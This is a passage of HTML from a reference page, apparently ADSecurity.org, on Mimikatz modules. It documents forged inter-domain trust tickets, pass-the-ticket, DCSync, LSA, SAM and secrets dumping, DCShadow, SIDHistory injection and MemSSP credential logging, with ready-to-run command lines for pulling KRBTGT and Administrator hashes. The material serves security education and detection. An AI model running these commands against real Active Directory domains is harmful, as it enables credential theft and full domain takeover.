/sid:S-1-5-21-3677078698-724690114-1972670770 <strong>/sids:S-1-5-21-1581655573-3923512380-696647894-519</strong> /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi&#8221; exit</em></p> <p>Note: Using the /sids parameter will create a trust ticket for the target AD domain that says the holder is an Enterprise Admin.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1694" 
src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory.jpg" alt="TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory" width="898" height="418" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory.jpg 773w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory-300x140.jpg 300w" sizes="(max-width: 898px) 100vw, 898px" /></a></p> <p>NOTE: <a href="https://adsecurity.org/?p=1515">Older Mimikatz builds generated Silver Tickets with a hard-coded domain value which may appear in some events; as described in the 1/5/2016 update in the Golden Ticket section above, current builds place the NetBIOS domain name in that field instead. It&#8217;s also likely the domain field in logon/logoff events relating to a forged ticket will have anomalies when compared to valid Kerberos authentication.</a></p> <p><b>Step 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination domain. 
Save the TGS to a file.</b></p> <p>The resulting TGS provides EA access to the parent (root) domain’s Domain Controller by targeting the CIFS service in this example (but it could target any).</p> <p><em>Asktgs c:\temp\tickets\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1695" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory.jpg" alt="TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory" width="784" height="183" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory.jpg 638w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory-300x70.jpg 300w" sizes="(max-width: 784px) 100vw, 784px" /></a></p> <p><b>Step 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.</b></p> <p><em>Kirbikator lsa c:\temp\tickets\CIFS.ADSDC02.lab.adsecurity.org.kirbi</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1696" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess.jpg" alt="TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess" width="845" height="187" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess.jpg 700w, 
https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess-300x66.jpg 300w" sizes="(max-width: 845px) 100vw, 845px" /></a></p> <p><b><b>KERBEROS::Hash </b></b>&#8211; hash password to keys</p> <p><a id="KERBEROSList"></a><b><b>KERBEROS::List</b> &#8211;</b> List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user&#8217;s tickets.<b><br /> </b>Similar to functionality of &#8220;klist&#8221;.</p> <ul> <li>/export &#8211; export user tickets to files.</li> </ul> <p>Use <a href="#SEKURLSATickets">SEKURLSA::TICKETS</a> to dump Kerberos tickets for all authenticated users on the system.<br /> Note that there are circumstances where the user certificates won&#8217;t export. This requires running SEKURLSA::Tickets /export (with appropriate privileges).<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1853" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png" alt="Mimikatz-Kerberos-Purge" width="650" height="127" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png 650w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge-300x59.png 300w" sizes="(max-width: 650px) 100vw, 650px" /></a></p> <p><b>KERBEROS::PTC</b> &#8211; pass the cache (NT6)<br /> *Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.</p> <p>A good example of Mimikatz&#8217;s kerberos::ptc is when <a href="https://adsecurity.org/?p=676">exploiting MS14-068 with PyKEK</a>. 
PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg" rel="attachment wp-att-2348"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2348" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg" alt="Mimikatz-PTC-PyKEK-ccacheFile" width="1204" height="586" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg 1204w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile-300x146.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile-768x374.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile-1024x498.jpg 1024w" sizes="(max-width: 1204px) 100vw, 1204px" /></a></p> <p>&nbsp;</p> <p><a id="KERBEROSPTT"></a><b>KERBEROS::PTT</b> &#8211; pass the ticket<br /> After a <a href="https://adsecurity.org/?p=1667">Kerberos ticket is found</a>, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. 
No special rights required.<br /> Similar to SEKURLSA::PTH (Pass-The-Hash).</p> <ul> <li>/filename &#8211; the ticket&#8217;s filename (can be multiple)</li> <li>/directory &#8211; a directory path; all .kirbi files inside will be injected.</li> </ul> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png"><img loading="lazy" decoding="async" class="size-full wp-image-1887 alignnone" src="https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png" alt="KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2" width="862" height="242" srcset="https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png 862w, https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2-300x84.png 300w" sizes="(max-width: 862px) 100vw, 862px" /></a></p> <p><b>KERBEROS::Purge</b> &#8211; purge all Kerberos tickets<br /> Similar to functionality of &#8220;klist purge&#8221;. 
Run this command before passing tickets (PTC, PTT, etc.) to ensure the correct user context is used.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png"><img loading="lazy" decoding="async" class="size-full wp-image-1853 alignnone" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png" alt="Mimikatz-Kerberos-Purge" width="650" height="127" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png 650w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge-300x59.png 300w" sizes="(max-width: 650px) 100vw, 650px" /></a></p> <p><b>KERBEROS::TGT</b> &#8211; get current TGT for current user.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png"><img loading="lazy" decoding="async" class="size-full wp-image-1854 alignnone" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png" alt="Mimikatz-Kerberos-TGT" width="705" height="150" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png 705w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT-300x64.png 300w" sizes="(max-width: 705px) 100vw, 705px" /></a></p> <p>&nbsp;</p> <h4><b><a id="LSADUMP"></a>LSADUMP</b></h4> <p>The LSADUMP Mimikatz Module interacts with the Windows Local Security Authority (LSA) to extract credentials. Most of these commands require either debug rights (privilege::debug) or local System. By default, the Administrators group has Debug rights. 
Debug still has to be &#8220;activated&#8221; by running &#8220;privilege::debug&#8221;.</p> <p><b>LSADUMP::Backupkeys<br /> </b>Requires Administrator rights.<b><br /> </b></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1855" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys.png" alt="Mimikatz-LSADump-BackupKeys" width="471" height="219" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys.png 471w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys-300x139.png 300w" sizes="(max-width: 471px) 100vw, 471px" /></a></p> <p><b>LSADUMP::Cache</b> &#8211; Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)<br /> Requires Administrator rights.<b><br /> </b></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1856" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache.png" alt="Mimikatz-LSADump-Cache" width="778" height="151" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache.png 778w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache-300x58.png 300w" sizes="(max-width: 778px) 100vw, 778px" /></a></p> <p><b>LSADUMP::ChangeNTLM </b>&#8211; Ask a server to set a new password/ntlm for one user.</p> <p><strong><b>LSADUMP</b>::DCShadow</strong> &#8211; Push replication changes to a Domain Controller.  
Read more at <a href="https://www.dcshadow.com/">DCShadow.com</a>.<br /> This requires full AD admin rights or KRBTGT pw hash.<br /> DCShadow temporarily sets the computer to be a &#8220;DC&#8221; for the purposes of replication:</p> <ul> <li>Creates 2 objects in the AD forest Configuration partition.</li> <li>Updates the SPN of the computer used to include &#8220;GC&#8221; (Global Catalog) and &#8220;E3514235-4B06-11D1-AB04-00C04FC2DCD2&#8221; (AD Replication). More info on Kerberos Service Principal Names in the <a href="https://adsecurity.org/?page_id=183">ADSecurity SPN section</a>.</li> <li>Pushes the updates to DCs via DrsReplicaAdd and KCC.</li> <li>Removes the created objects from the Configuration partition.</li> </ul> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3958" src="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1.jpg" alt="" width="570" height="518" srcset="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1.jpg 1010w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1-300x272.jpg 300w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1-768x697.jpg 768w" sizes="(max-width: 570px) 100vw, 570px" /></p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3955" src="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push.jpg" alt="" width="1557" height="827" srcset="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push.jpg 1557w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push-300x159.jpg 300w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push-768x408.jpg 768w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push-1024x544.jpg 1024w" sizes="(max-width: 1557px) 100vw, 1557px" /></p> <p>Temporary DC object in the Configuration partition<img loading="lazy" decoding="async" class="alignnone size-full wp-image-3956" 
src="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01.jpg" alt="" width="1397" height="313" srcset="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01.jpg 1397w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01-300x67.jpg 300w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01-768x172.jpg 768w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01-1024x229.jpg 1024w" sizes="(max-width: 1397px) 100vw, 1397px" /></p> <p><a id="LSADUMPDCSync"></a><a href="https://adsecurity.org/?p=1729"><b>LSADUMP::DCSync</b></a> &#8211; ask a DC to synchronize an object (get password data for account)<br /> <a href="https://adsecurity.org/?p=1729">Requires membership in Domain Administrator, domain Administrators, or custom delegation.<b></b></a></p> <p>A major feature added to Mimikatz in August 2015 is “DCSync”, which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller. DCSync was written by Benjamin Delpy and Vincent Le Toux. As of Mimikatz version 2.1 alpha 20160501, DCSync works with renamed domains.</p> <p>The exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the KRBTGT password hash to create Golden Tickets. With Mimikatz’s DCSync and the appropriate rights, the attacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit).</p> <p>Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. 
Note that Read-Only Domain Controllers are not allowed to pull password data for users by default.</p> <p><b>How DCSync works:</b></p> <ol> <li>Discovers a Domain Controller in the specified domain name.</li> <li>Requests the Domain Controller replicate the user credentials via <a href="https://msdn.microsoft.com/en-us/library/dd207691.aspx">GetNCChanges </a>(leveraging <a href="https://msdn.microsoft.com/en-us/library/cc228086.aspx">Directory Replication Service (DRS) Remote Protocol</a>)</li> </ol> <p>I have previously done some packet captures for <a href="http://blogs.metcorpconsulting.com/tech/?p=923">Domain Controller replication</a> and identified the intra-DC communication flow regarding how Domain Controllers replicate.</p> <p>The Samba Wiki describes the <a href="https://wiki.samba.org/index.php/DRSUAPI">DSGetNCChanges function</a>:</p> <p><i>“The client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects updates from the second one. The response contains a set of updates that the client has to apply to its NC replica. &#8230;<br /> When a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data structure) it performs a replication cycle where it behaves like a client and makes DSGetNCChanges requests to that DC. So it gets up-to-date AD objects from each of the DC’s which it replicates from.”</i></p> <p><a id="DCSync"></a><strong><span style="text-decoration: underline;">DCSync Options:</span></strong></p> <ul> <li>/all &#8211; DCSync pulls data for the entire domain.</li> <li>/user &#8211; user id or SID of the user you want to pull the data for.</li> <li>/domain (optional) &#8211; FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. 
If this parameter is not provided, Mimikatz defaults to the current domain.</li> <li>/csv &#8211; export to csv</li> <li>/dc (optional) &#8211; Specify the Domain Controller you want DCSync to connect to and gather data.</li> </ul> <p>There&#8217;s also a /guid parameter.</p> <p><strong><span style="text-decoration: underline;">DCSync Command Examples:</span></strong></p> <p>Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:<br /> <em>Mimikatz &#8220;lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt&#8221; exit</em></p> <p>Pull password data for the Administrator user account in the rd.adsecurity.org domain:<br /> <em>Mimikatz &#8220;lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator&#8221; exit</em></p> <p>Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:<br /> <em>Mimikatz  &#8220;lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$&#8221; exit</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync.jpg"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1822" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync.jpg" alt="Mimikatz-LSADump-DCSync" width="691" height="491" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync.jpg 691w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync-300x213.jpg 300w" sizes="(max-width: 691px) 100vw, 691px" /></a></p> <p><b>LSADUMP::LSA</b> &#8211; Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. 
<em>Requires System or Debug rights.</em></p> <ul> <li>/inject &#8211; Inject LSASS to extract credentials</li> <li>/name &#8211; account name for target user account</li> <li>/id &#8211; RID for target user account</li> <li>/patch &#8211; patch LSASS.</li> </ul> <p>Often service accounts are members of Domain Admins (or equivalent), or a Domain Admin was recently logged on to the computer an attacker dumps credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash, which is used to create Kerberos Golden Tickets.</p> <p>Command:  mimikatz lsadump::lsa /inject exit</p> <p>Dumps credential data in an Active Directory domain when run on a Domain Controller.<br /> Requires administrator access (with debug rights) or Local SYSTEM rights.</p> <p>The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1823" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA.png" alt="Mimikatz-LSADump-LSA" width="413" height="595" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA.png 413w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA-208x300.png 208w" sizes="(max-width: 413px) 100vw, 413px" /></a></p> <p>Here&#8217;s the result when running LSADUMP::lsa /patch, which only dumps the NTLM password hashes.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/InvokeMimikatz-DumpADdb-KRBTGT3.png"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="InvokeMimikatz-DumpADdb-KRBTGT" 
src="https://adsecurity.org/wp-content/uploads/2015/01/InvokeMimikatz-DumpADdb-KRBTGT_thumb3.png" alt="InvokeMimikatz-DumpADdb-KRBTGT" width="580" height="653" border="0" /></a></p> <p><a id="LSADUMPNetSync"></a><strong>LSADUMP::NetSync</strong></p> <p>NetSync provides a simple way to use DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account&#8217;s information, including the password data.</p> <p><b><b>LSADUMP::RpData</b></b></p> <p><a id="LSADUMPSAM"></a><b>LSADUMP::SAM</b> &#8211; get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.<br /> <em>Requires System or Debug rights.</em><br /> It contains the NTLM hash, and sometimes the LM hash, of users&#8217; passwords. It can work in two modes: online (with SYSTEM user or token) or offline (with SYSTEM &amp; SAM hives or backup).</p> <p>Requires administrator access (with debug rights) or Local SYSTEM rights when run against an online SAM.</p> <p><em>Getting an impersonated SYSTEM token: Mimikatz &#8220;PRIVILEGE::Debug&#8221; &#8220;TOKEN::elevate&#8221;<br /> </em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1824" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM.png" alt="Mimikatz-LSADump-SAM" width="378" height="202" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM.png 378w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM-300x160.png 300w" sizes="(max-width: 378px) 100vw, 378px" /></a></p> <p><b>LSADUMP::Secrets</b> &#8211; get the SysKey to decrypt SECRETS entries (from registry or hives).<br /> <em>Requires System or Debug rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets.png"><img 
loading="lazy" decoding="async" class="alignnone size-full wp-image-1825" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets.png" alt="Mimikatz-LSADump-Secrets" width="841" height="463" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets.png 841w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets-300x165.png 300w" sizes="(max-width: 841px) 100vw, 841px" /></a></p> <p><b>LSADUMP::SetNTLM </b>&#8211; Ask a server to set a new password/ntlm for one user.</p> <p><a id="LSADUMPTrust"></a><a href="https://adsecurity.org/?p=1588"><b>LSADUMP::Trust</b></a> &#8211; Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).<br /> <em>Requires System or Debug rights.</em></p> <p>Extracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is displayed as well.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1826" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust.png" alt="Mimikatz-LSADump-Trust" width="844" height="640" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust.png 844w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust-300x227.png 300w" sizes="(max-width: 844px) 100vw, 844px" /></a></p> <p>&nbsp;</p> <h4><b><a id="MISC"></a>MISC</b></h4> <p>The MISC Mimikatz module is kind of a catch-all for commands that don&#8217;t quite fit elsewhere.<br /> The best-known commands in this module are MISC::AddSID, MISC::MemSSP, and MISC::Skeleton.</p> <p><a id="MISCAddSid"></a><a href="https://adsecurity.org/?p=1772"><b>MISC::AddSid</b></a> &#8211; Add SIDHistory to a user account. 
The first value is the target account and the second value is the account/group name(s) (or SID).<br /> <em>Requires System or Debug rights.</em></p> <p><em>NOTE: ADDSID has moved to the SID module in the 2.1 release branch.</em><br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1898" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1.png" alt="SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator" width="661" height="204" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1.png 661w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1-300x93.png 300w" sizes="(max-width: 661px) 100vw, 661px" /></a><a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1897" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1.png" alt="SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett" width="517" height="192" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1.png 517w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1-300x111.png 300w" sizes="(max-width: 517px) 100vw, 517px" /></a></p> <p><b>MISC::Cmd</b> &#8211; Command Prompt (without DisableCMD).<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1827" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD.png" 
alt="Mimikatz-Misc-CMD" width="676" height="394" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD.png 676w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD-300x175.png 300w" sizes="(max-width: 676px) 100vw, 676px" /></a></p> <p><b>MISC::Compressme </b>&#8211; Compresses Mimikatz file to a new file called &#8220;mimikatz_x64.compressed&#8221;<em><br /> </em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe.jpg" rel="attachment wp-att-2693"><img loading="lazy" decoding="async" class="alignnone wp-image-2693" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe.jpg" alt="Mimikatz-Misc-CompressMe" width="340" height="71" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe.jpg 459w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe-300x63.jpg 300w" sizes="(max-width: 340px) 100vw, 340px" /></a></p> <p><b>MISC::Detours</b> &#8211; (<em><strong>experimental</strong></em>) Try to enumerate all modules with Detours-like hooks<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1828" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours.png" alt="Mimikatz-Misc-Detours" width="538" height="512" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours.png 538w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours-300x286.png 300w" sizes="(max-width: 538px) 100vw, 538px" /></a></p> <p><a id="MISCMemSSP"></a><b>MISC::MemSSP</b> &#8211; Inject a malicious Windows SSP to log locally authenticated credentials by patching LSASS in memory with new SSP &#8211; no reboot required (rebooting clears the memssp Mimikatz injects). 
This <a href="https://adsecurity.org/?p=1760">post on Mimikatz SSP describes in-memory patching as well as more persistent SSP techniques</a>.<br /> Requires Administrator rights.<a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf"><br /> </a><a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1899" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011.png" alt="SneakyPersistence-EnableMimiSSP-MemSSP-01" width="639" height="191" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011.png 639w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011-300x90.png 300w" sizes="(max-width: 639px) 100vw, 639px" /></a><a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf"><br /> </a><a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf">Mandiant presentation on MemSSP</a></p> <p><strong>MISC::MFLT</strong> &#8211; Gathers details on loaded drivers, including driver altitude.<br /> Available starting with Mimikatz v2.1.1 (11/28/2017).</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3814" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Misc-Mflt-01.png" alt="" width="259" height="177" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Misc-Mflt-01.png 397w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Misc-Mflt-01-300x205.png 300w" sizes="(max-width: 259px) 100vw, 259px" /></p> <p><b>MISC::Ncroutemon</b> &#8211; Juniper Manager (without DisableTaskMgr)</p> <p><b>MISC::Regedit</b> &#8211; Registry Editor (without DisableRegistryTools)<br /> <em>Requires Administrator rights.</em></p> <p><a 
